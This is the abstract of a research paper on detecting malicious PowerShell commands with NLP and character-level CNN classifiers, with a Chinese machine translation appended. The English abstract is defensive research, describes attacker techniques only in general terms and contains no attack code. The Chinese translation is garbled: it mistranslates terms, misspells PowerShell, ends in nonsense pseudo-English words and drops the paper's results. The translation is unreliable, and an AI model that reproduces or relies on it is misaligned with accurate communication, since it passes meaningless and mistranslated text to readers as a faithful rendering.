Microsoft's PowerShell is a command-line shell and scripting language that is installed by default on Windows machines. While PowerShell can be configured by administrators for restricting access and reducing vulnerabilities, these restrictions can be bypassed. Moreover, PowerShell commands can be easily generated dynamically, executed from memory, encoded and obfuscated, thus making the logging and forensic analysis of code executed by PowerShell challenging.For all these reasons, PowerShell is increasingly used by cybercriminals as part of their attacks' tool chain, mainly for downloading malicious contents and for lateral movement. Indeed, a recent comprehensive technical report by Symantec dedicated to PowerShell's abuse by cybercrimials reported on a sharp increase in the number of malicious PowerShell samples they received and in the number of penetration tools and frameworks that use PowerShell. This highlights the urgent need of developing effective methods for detecting malicious PowerShell commands.In this work, we address this challenge by implementing several novel detectors of malicious PowerShell commands and evaluating their performance. We implemented both "traditional" natural language processing (NLP) based detectors and detectors based on character-level convolutional neural networks (CNNs). Detectors' performance was evaluated using a large real-world dataset.Our evaluation results show that, although our detectors individually yield high performance, an ensemble detector that combines an NLP-based classifier with a CNN-based classifier provides the best performance, since the latter classifier is able to detect malicious commands that succeed in evading the former. Our analysis of these evasive commands reveals that some obfuscation patterns automatically detected by the CNN classifier are intrinsically difficult to detect using the NLP techniques we applied.
翻译:Microsoft PowerShell 是Windows 机器默认安装的指令直线外壳和脚本语言。 虽然 PowerShell 可以由管理员配置, 限制访问和降低脆弱性, 这些限制可以绕过。 此外, PowerShell 命令可以很容易地动态生成, 从记忆中执行, 编码和模糊, 从而使得PowerShell所执行的代码的记录和法证分析具有挑战性。 由于所有这些原因, PowerShell 越来越多地被网络罪犯用作其攻击工具链的一部分, 主要是用于下载恶意内容和横向移动。 事实上, Symantec 最近为PowerSherll 滥用网络进行的全面技术报告, 显示他们收到的恶意的PowerShell样本数量急剧增加, 并显示使用PowerShell的渗透工具和框架的数量。 这凸显了开发有效方法检测恶意Shell指令的迫切需要。 在这项工作中, 我们用一些基于传统语言的 Overnial comlial 处理( NLP) 的 Over liver commoal deal commal lader) 。